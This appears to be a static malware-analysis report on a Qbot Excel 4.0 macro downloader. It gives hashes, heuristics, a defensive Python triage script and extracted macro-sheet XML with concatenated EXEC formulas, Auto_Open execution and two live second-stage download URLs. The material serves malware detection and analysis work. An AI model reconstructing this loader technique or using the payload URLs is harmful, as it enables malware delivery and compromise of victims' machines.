Qbot — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 03bcc41875b96d1e…

Verdict: MALICIOUS

File type: Office (OOXML) / .XLSM
Size: 166.6 KB
Created: 2006-09-16 00:00:00 UTC
Authoring application: Microsoft Excel 14.0300
MD5: 3d2925a91758a074901c942b41100085
SHA-1: 1d19198a3f8370d7481ed3503b5f448c278fbd07
SHA-256: 03bcc41875b96d1e6261bc8caeb9aa7ae92736fc4617d8c7bd22d8846889b9c3
Risk score: 262

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution (note: no software vulnerability is involved in this sample; the macro runs only after the user enables content, which ATT&CK models as T1204.002 User Execution: Malicious File)

The file is a macro-enabled Excel workbook (XLSM) carrying four Excel 4.0 (XLM) macro sheets (xl/macrosheets/intlsheet1.xml through intlsheet4.xml) and an _xlnm.Auto_Open defined name, so the macro starts as soon as a user enables content; no vulnerability is exploited. The macro cells sit in columns marked hidden="1", and the EXEC() argument is not a literal: it is assembled at run time by concatenating cells from another sheet with a shared-string cell (EXEC(Sheet2!AM34&AL18&Sheet2!AJ32), where AL18 is a t="s" cell indexing the shared-string table), so the command line never appears as a contiguous string in any single part. A second copy of the EXEC formula is prefixed with junk arithmetic (654984654984+1694894654=EXEC(...)), and a HALT() cell ends the macro. The largest macro sheet (intlsheet1.xml, 204903 bytes) is mostly empty styled cells, padding that inflates the file and buries the two shell/COM execution tokens found in it. Of the extracted URLs, only https://yohsinsolutions.com/0QeH3HFbNyY/kk.html and https://gtec24.com/0mqp0yN6/kk.html are candidate second-stage download locations; the rest are XML namespace URIs. Together with the ClamAV signature (Xls.Downloader.Qbot0421) this is consistent with a Qbot first-stage downloader. The Created timestamp (2006-09-16 00:00:00) is a placeholder date found in many documents built from stock Office templates and says nothing about when this file was actually produced.

Heuristics (6)

  • [critical] ClamAV: Xls.Downloader.Qbot0421-9856653-0 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.Qbot0421-9856653-0.
  • [critical] Excel 4.0 macro sheet (4 sheets; 2 related findings) (OOXML_XLM_MACROSHEET)
    The workbook contains Excel 4.0 (XLM) macro sheets. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks, so its presence alone warrants a close look.
  • [critical] Excel 4.0 Auto_Open defined name (OOXML_XLM_AUTOOPEN_DEFINEDNAME)
    The workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close in xl/workbook.xml while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: the named cell is where Excel starts evaluating macro formulas once macros are enabled.
  • [critical] Dangerous XLM formula APIs: EXEC, FORMULA, CALL, HALT (OOXML_XLM_DANGEROUS_FN)
    The macro sheets use the XLM primitives that let a macro act outside the workbook without VBA: EXEC starts a process; CALL and REGISTER invoke exported functions of arbitrary DLLs, including Win32 APIs, which is how payloads are downloaded and files written; FORMULA writes a formula into another cell at run time, so a macro can assemble its own next instructions; HALT stops macro execution, typically once the payload has been launched.
  • [medium] Suspicious extracted artifact (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Candidate second-stage URLs, in document text (OOXML body / shared strings):
    • https://yohsinsolutions.com/0QeH3HFbNyY/kk.html
    • https://gtec24.com/0mqp0yN6/kk.html
    XML namespace URIs, also in document text (OOXML body / shared strings). These are schema identifiers from the OOXML parts and from embedded image metadata (Adobe XMP, Dublin Core; each macro sheet references a drawing part) and are not indicators:
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
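Added here as a worked example (it is not the analysis pipeline's code and not part of the original report): a standard-library Python script that performs the checks the heuristics above describe on an OOXML workbook. It lists the parts under xl/macrosheets/, reads the _xlnm.Auto_Open / _xlnm.Auto_Close defined names from xl/workbook.xml, flags formulas that use the dangerous XLM functions, and then resolves the cell references an EXEC() argument concatenates, so a command line spliced from another sheet and the shared-string table is shown as one string. The workbook it builds in memory is constructed to mirror this sample's layout (veryHidden macro sheet, Auto_Open pointing at it, EXEC(Sheet2!AM34&AL18&Sheet2!AJ32) with AL18 a shared string); the sheet names, part names and the benign command text are assumptions, not values from the sample, since the report does not show the Sheet2 cells the real formula reads.

```python
"""XLM (Excel 4.0) macro triage for an OOXML .xlsm, Python standard library only.
Added example for this report, not the analysis pipeline's code. build_sample() is a
constructed workbook (an assumption, not the analysed file) with a benign command.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
PKG_REL = "{http://schemas.openxmlformats.org/package/2006/relationships}"
R_ID = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
DANGEROUS = {"EXEC", "CALL", "REGISTER", "FORMULA", "HALT"}  # the XLM functions the report flags
FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\s*\(")  # also matches AE8()-style macro calls; DANGEROUS filters them
REF_RE = re.compile(r"(?<![\w$])(?:(?P<sheet>\w+)!)?(?P<addr>\$?[A-Z]{1,3}\$?\d+)\b")  # unquoted sheet names only

def shared_strings(z):
    """xl/sharedStrings.xml as a list; rich-text runs inside one <si> are joined."""
    if "xl/sharedStrings.xml" not in z.namelist():
        return []
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(MAIN + "t")) for si in root.findall(MAIN + "si")]

def workbook_info(z):
    """(sheet name -> part path, [(auto-exec defined name, target)]) from workbook.xml and its .rels."""
    wb = ET.fromstring(z.read("xl/workbook.xml"))
    rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    targets = {r.get("Id"): r.get("Target") for r in rels.findall(PKG_REL + "Relationship")}
    paths = {}
    for s in wb.iter(MAIN + "sheet"):  # macro sheets are listed in <sheets> like worksheets
        target = targets[s.get(R_ID)].lstrip("/")
        paths[s.get("name")] = target if target.startswith("xl/") else "xl/" + target
    auto = [(d.get("name"), (d.text or "").strip()) for d in wb.iter(MAIN + "definedName")
            if d.get("name", "").startswith(("_xlnm.Auto_Open", "_xlnm.Auto_Close"))]
    return paths, auto

def sheet_cells(z, path, strings):
    """{addr: (formula or None, value)} for one part; t="s" cells go through the shared-string table."""
    cells = {}
    for c in ET.fromstring(z.read(path)).iter(MAIN + "c"):
        f, v = c.find(MAIN + "f"), c.find(MAIN + "v")
        value = v.text if v is not None else None
        if c.get("t") == "s" and value is not None:
            value = strings[int(value)]
        cells[c.get("r")] = (f.text if f is not None else None, value)
    return cells

def resolve_refs(formula, sheet, book):
    """Swap references to plain data cells for their quoted values; cells that hold macros stay as refs."""
    def sub(m):
        cell = book.get(m.group("sheet") or sheet, {}).get(m.group("addr").replace("$", ""), (None, None))
        return '"%s"' % cell[1] if cell[0] is None and cell[1] is not None else m.group(0)
    return REF_RE.sub(sub, formula)

def join_concat(s):
    """Fold "a"&"b" into "ab" until nothing changes (values containing a double quote are not handled)."""
    pat = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
    while True:
        s, n = pat.subn(lambda m: '"%s%s"' % (m.group(1), m.group(2)), s)
        if not n:
            return s

def triage(xlsm_bytes):
    z = zipfile.ZipFile(io.BytesIO(xlsm_bytes))
    strings, (paths, auto) = shared_strings(z), workbook_info(z)
    book = {name: sheet_cells(z, path, strings) for name, path in paths.items()}
    macro_sheets = [n for n, p in paths.items() if p.startswith("xl/macrosheets/")]
    findings = []
    for name in macro_sheets:
        for addr, (formula, _) in book[name].items():
            hits = sorted(set(FUNC_RE.findall(formula or "")) & DANGEROUS)
            if hits:
                findings.append({"cell": "%s!%s" % (name, addr), "functions": hits, "formula": formula,
                                 "resolved": join_concat(resolve_refs(formula, name, book))})
    return {"macro_sheets": macro_sheets, "auto_exec": auto, "findings": findings}

def build_sample():
    """Constructed XLSM: Auto_Open targets a veryHidden macro sheet whose EXEC() argument is spliced
    from two Sheet2 cells and one shared string, mirroring the analysed file's layout."""
    main = 'xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
    parts = {
        "xl/workbook.xml": '<workbook %s xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<sheets><sheet name="Sheet2" sheetId="1" r:id="rId1"/><sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets>'
            '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$AO$18</definedName></definedNames></workbook>' % main,
        "xl/_rels/workbook.xml.rels": '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/intlsheet3.xml"/></Relationships>',
        "xl/sharedStrings.xml": '<sst %s><si><t>cmd /c </t></si><si><t>echo </t></si><si><t>xlm-triage-demo</t></si></sst>' % main,
        "xl/worksheets/sheet1.xml": '<worksheet %s><sheetData><row r="32"><c r="AJ32" t="s"><v>2</v></c></row>'
            '<row r="34"><c r="AM34" t="s"><v>0</v></c></row></sheetData></worksheet>' % main,
        "xl/macrosheets/intlsheet3.xml": '<xm:macrosheet %s xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>'
            '<row r="18"><c r="AL18" t="s"><v>1</v></c><c r="AO18" t="b"><f>EXEC(Sheet2!AM34&amp;AL18&amp;Sheet2!AJ32)</f><v>1</v></c></row>'
            '<row r="19"><c r="AO19" t="b"><f>HALT()</f><v>1</v></c></row></sheetData></xm:macrosheet>' % main,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, '<?xml version="1.0" encoding="UTF-8"?>' + xml)
    return buf.getvalue()

if __name__ == "__main__":
    for f in triage(build_sample())["findings"]:
        print(f["cell"], f["functions"], f["formula"], "->", f["resolved"])
```

Against a real file, pass open(path, "rb").read() to triage(). The resolver is deliberately static: it only substitutes cells that hold plain data, so references to other macro cells (like the sample's =Sheet5!AE8() call) are left intact, and it does not handle quoted sheet names, R1C1 references or cells that FORMULA() writes at run time. When the command is built by those means, an XLM emulator such as XLMMacroDeobfuscator is the next step.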

Extracted artifacts (4)

Files carved from inside the sample during analysis. Each entry lists filename, SHA-256, kind, source part and size, followed by a preview of the extracted content.

xlm_sheet_00.xml
SHA-256: 3053dafa2d3f987ce513cbeee21a23bb155656d1a3bacf27e3c9fd23a98df2cd
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet, xl/macrosheets/intlsheet3.xml
Size: 1245 bytes
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AL18:AO18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="36" width="4.42578125" style="4"/><col min="37" max="37" width="4.42578125" style="4" customWidth="1"/><col min="38" max="41" width="4.42578125" style="4" hidden="1" customWidth="1"/><col min="42" max="16384" width="4.42578125" style="4"/></cols><sheetData><row r="18" spans="38:41" x14ac:dyDescent="0.25"><c r="AL18" s="4" t="s"><v>26</v></c><c r="AO18" s="3" t="b"><f>EXEC(Sheet2!AM34&amp;AL18&amp;Sheet2!AJ32)=Sheet5!AE8()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><drawing r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml
SHA-256: 7c70a733295093fa9be986f7921d4989b1ff5b1c9e7d7c0416a4b8d6aa837808
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet, xl/macrosheets/intlsheet1.xml
Size: 204903 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 shell/COM execution tokens)
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A1:BV283"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="38" width="4.5703125" style="4"/><col min="39" max="40" width="4.5703125" style="4" customWidth="1"/><col min="41" max="48" width="4.5703125" style="4" hidden="1" customWidth="1"/><col min="49" max="16384" width="4.5703125" style="4"/></cols><sheetData><row r="1" spans="1:41" x14ac:dyDescent="0.25"><c r="A1" s="3"/><c r="B1" s="3"/><c r="C1" s="3"/><c r="D1" s="3"/><c r="E1" s="3"/><c r="F1" s="3"/><c r="G1" s="3"/><c r="H1" s="3"/><c r="I1" s="3"/><c r="J1" s="3"/><c r="K1" s="3"/><c r="L1" s="3"/><c r="M1" s="3"/><c r="N1" s="3"/><c r="O1" s="3"/><c r="P1" s="3"/><c r="Q1" s="3"/><c r="R1" s="3"/><c r="S1" s="3"/><c r="T1" s="3"/><c r="U1" s="3"/><c r="V1" s="3"/><c r="W1" s="3"/><c r="X1" s="3"/><c r="Y1" s="3"/><c r="Z1" s="3"/><c r="AA1" s="3"/><c r="AB1" s="3"/><c r="AC1" s="3"/><c r="AD1" s="3"/><c r="AE1" s="3"/><c r="AF1" s="3"/><c r="AG1" s="3"/><c r="AH1" s="3"/><c r="AI1" s="3"/><c r="AJ1" s="3"/></row><row r="2" spans="1:41" x14ac:dyDescent="0.25"><c r="A2" s="3"/><c r="B2" s="3"/><c r="C2" s="3"/><c r="D2" s="3"/><c r="E2" s="3"/><c r="F2" s="3"/><c r="G2" s="3"/><c r="H2" s="3"/><c r="I2" s="3"/><c r="J2" s="3"/><c r="K2" s="3"/><c r="L2" s="3"/><c r="M2" s="3"/><c r="N2" s="3"/><c r="O2" s="3"/><c r="P2" s="3"/><c r="Q2" s="3"/><c r="R2" s="3"/><c r="S2" s="3"/><c r="T2" s="3"/><c r="U2" s="3"/><c r="V2" s="3"/><c r="W2" s="3"/><c r="X2" 
s="3"/><c r="Y2" s="3"/><c r="Z2" s="3"/><c r="AA2" s="3"/><c r="AB2" s="3"/><c r="AC2" s="3"/><c r="AD2" s="3"/><c r="AE2" s="3"/><c r="AF2" s="3"/><c r="AG2" s="3"/><c r="AH2" s="3"/><c r="AI2" s="3"/><c r="AJ2" s="3"/></row><row r="3" spans="1:41" x14ac:dyDescent="0.25"><c r="A3" s="3"/><c r="B3" s="3"/><c r="C3" s="3"/><c r="D3" s="3"/><c r="E3" s="3"/><c r="F3" s="3"/><c r="G3" s="3"/><c r="H3" s="3"/><c r="I3" s="3"/><c r="J3" s="3"/><c r="K3" s="3"/><c r="L3" s="3"/><c r="M3" s="3"/><c r="N3" s="3"/><c r="O3" s="3"/><c r="P3" s="3"/><c r="Q3" s="3"/><c r="R3" s="3"/><c r="S3" s="3"/><c r="T3" s="3"/><c r="U3" s="3"/><c r="V3" s="3"/><c r="W3" s="3"/><c r="X3" s="3"/><c r="Y3" s="3"/><c r="Z3" s="3"/><c r="AA3" s="3"/><c r="AB3" s="3"/><c r="AC3" s="3"/><c r="AD3" s="3"/><c r="AE3" s="3"/><c r="AF3" s="3"/><c r="AG3" s="3"/></row><row r="4" spans="1:41" x14ac:dyDescent="0.25"><c r="A4" s="3"/><c r="B4" s="3"/><c r="C4" s="3"/><c r="D4" s="3"/><c r="E4" s="3"/><c r="F4" s="3"/><c r="G4" s="3"/><c r="H4" s="3"/><c r="I4" s="3"/><c r="J4" s="3"/><c r="K4" s="3"/><c r="L4" s="3"/><c r="M4" s="3"/><c r="N4" s="3"/><c r="O4" s="3"/><c r="P4" s="3"/><c r="Q4" s="3"/><c r="R4" s="3"/><c r="S4" s="3"/><c r="T4" s="3"/><c r="U4" s="3"/><c r="V4" s="3"/><c r="W4" s="3"/><c r="X4" s="3"/><c r="Y4" s="3"/><c r="Z4" s="3"/><c r="AA4" s="3"/><c r="AB4" s="3"/><c r="AC4" s="3"/><c r="AD4" s="3"/><c r="AE4" s="3"/><c r="AF4" s="3"/><c r="AG4" s="3"/></row><row r="5" spans="1:41" x14ac:dyDescent="0.25"><c r="A5" s="3"/><c r="B5" s="3"/><c r="C5" s="3"/><c r="D5" s="3"/><c r="E5" s="3"/><c r="F5" s="3"/><c r="G5" s="3"/><c r="H5" s="3"/><c r="I5" s="3"/><c r="J5" s="3"/><c r="K5" s="3"/><c r="L5" s="3"/><c r="M5" s="3"/><c r="N5" s="3"/><c r="O5" s="3"/><c r="P5" s="3"/><c r="Q5" s="3"/><c r="R5" s="3"/><c r="S5" s="3"/><c r="T5" s="3"/><c r="U5" s="3"/><c r="V5" s="3"/><c r="W5" s="3"/><c r="X5" s="3"/><c r="Y5" s="3"/><c r="Z5" s="3"/><c r="AA5" s="3"/><c r="AB5" s="3"/><c 
r="AC5" s="3"/><c r="AD5" s="3"/><c r="AE5"
... (truncated)
xlm_sheet_02.xml
SHA-256: 6cb3ab47226c206f666f8830fc35f10e422712c9d53bd66c647d57a05f0b41bc
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet, xl/macrosheets/intlsheet2.xml
Size: 4485 bytes
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="L13:AM37"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="32" width="4.42578125" style="4"/><col min="33" max="39" width="4.42578125" style="4" hidden="1" customWidth="1"/><col min="40" max="16384" width="4.42578125" style="4"/></cols><sheetData><row r="13" spans="33:39" x14ac:dyDescent="0.25"><c r="AG13" s="4" t="s"><v>25</v></c><c r="AI13" s="3" t="b"><f>654984654984+1694894654=EXEC(Sheet2!AM34&amp;AG13&amp;Sheet2!AJ32)</f><v>0</v></c></row><row r="14" spans="33:39" x14ac:dyDescent="0.25"><c r="AK14" s="3" t="s"><v>4</v></c><c r="AL14" s="3" t="s"><v>5</v></c><c r="AM14" s="4" t="s"><v>6</v></c></row><row r="15" spans="33:39" x14ac:dyDescent="0.25"><c r="AI15" s="3" t="b"><f>Sheet4!AO14()</f><v>0</v></c><c r="AK15" s="3" t="s"><v>0</v></c><c r="AL15" s="3" t="s"><v>5</v></c><c r="AM15" s="4" t="s"><v>7</v></c></row><row r="16" spans="33:39" x14ac:dyDescent="0.25"><c r="AI16" s="3"/><c r="AK16" s="3" t="s"><v>1</v></c><c r="AL16" s="3" t="s"><v>8</v></c><c r="AM16" s="4" t="s"><v>7</v></c></row><row r="17" spans="12:39" x14ac:dyDescent="0.25"><c r="AI17" s="3"/><c r="AK17" s="3" t="s"><v>9</v></c><c r="AL17" s="3" t="s"><v>8</v></c><c r="AM17" s="4" t="s"><v>0</v></c></row><row r="18" spans="12:39" x14ac:dyDescent="0.25"><c r="AI18" s="3"/><c r="AK18" s="3" t="s"><v>3</v></c><c r="AL18" s="3" t="s"><v>10</v></c><c r="AM18" s="4" t="s"><v>11</v></c></row><row r="19" spans="12:39" x14ac:dyDescent="0.25"><c 
r="AK19" s="3" t="s"><v>12</v></c><c r="AL19" s="3" t="s"><v>10</v></c><c r="AM19" s="4" t="s"><v>13</v></c></row><row r="20" spans="12:39" x14ac:dyDescent="0.25"><c r="AK20" s="3" t="s"><v>14</v></c><c r="AL20" s="3"/><c r="AM20" s="4" t="s"><v>15</v></c></row><row r="21" spans="12:39" x14ac:dyDescent="0.25"><c r="AK21" s="3" t="s"><v>7</v></c><c r="AL21" s="3"/><c r="AM21" s="4" t="s"><v>16</v></c></row><row r="22" spans="12:39" x14ac:dyDescent="0.25"><c r="AK22" s="3" t="s"><v>3</v></c><c r="AL22" s="3"/><c r="AM22" s="4" t="s"><v>17</v></c></row><row r="23" spans="12:39" x14ac:dyDescent="0.25"><c r="AK23" s="3" t="s"><v>18</v></c><c r="AL23" s="3"/><c r="AM23" s="4" t="s"><v>11</v></c></row><row r="24" spans="12:39" x14ac:dyDescent="0.25"><c r="AK24" s="3" t="s"><v>19</v></c><c r="AL24" s="3"><v>0</v></c><c r="AM24" s="4" t="s"><v>20</v></c></row><row r="25" spans="12:39" x14ac:dyDescent="0.25"><c r="AK25" s="3" t="s"><v>21</v></c><c r="AL25" s="3"/><c r="AM25" s="4" t="s"><v>22</v></c></row><row r="26" spans="12:39" x14ac:dyDescent="0.25"><c r="AK26" s="3" t="s"><v>3</v></c><c r="AL26" s="3"/><c r="AM26" s="4" t="s"><v>11</v></c></row><row r="27" spans="12:39" x14ac:dyDescent="0.25"><c r="L27" s="3"/><c r="AK27" s="3" t="s"><v>23</v></c><c r="AL27" s="3"/><c r="AM27" s="4" t="s"><v>20</v></c></row><row r="28" spans="12:39" x14ac:dyDescent="0.25"><c r="L28" s="3"/><c r="AK28" s="3" t="s"><v>15</v></c><c r="AL28" s="3"/><c r="AM28" s="4" t="s"><v>24</v></c></row><row r="29" spans="12:39" x14ac:dyDescent="0.25"><c r="L29" s="3"/><c r="AK29" s="3" t="s"><v>7</v></c><c r="AL29" s="3"/><c r="AM29" s="4" t="s"><v>20</v></c></row><row r="30" spans="12:39" x14ac:dyDescent="0.25"><c r="L30" s="3"/><c r="AK30" s="3" t="s"><v>11</v></c><c r="AL30" s="3"/></row><row r="31" spans="12:39" x14ac:dyDescent="0.25"><c r="L31" s="3"/></row><row r="32" spans="12:39" x14ac:dyDescent="0.25"><c r="L32" s="3"/></row><row r="33" spans="12:12" x14ac:dyDescent="0.25"><c r="L33" 
s="3"/></row><row r="34" spans="12:12" x14ac:dyDescent
... (truncated)
xlm_sheet_03.xml
SHA-256: 95eb9ac669583f7114c029725ae2ac1b158fd43ff181b1370db5057cd2dc1558
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet, xl/macrosheets/intlsheet4.xml
Size: 1082 bytes
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AE9"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="30" width="4.42578125" style="4"/><col min="31" max="31" width="4.42578125" style="4" hidden="1" customWidth="1"/><col min="32" max="16384" width="4.42578125" style="4"/></cols><sheetData><row r="9" spans="31:31" x14ac:dyDescent="0.25"><c r="AE9" s="3" t="b"><f>HALT()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><drawing r:id="rId1"/></xm:macrosheet>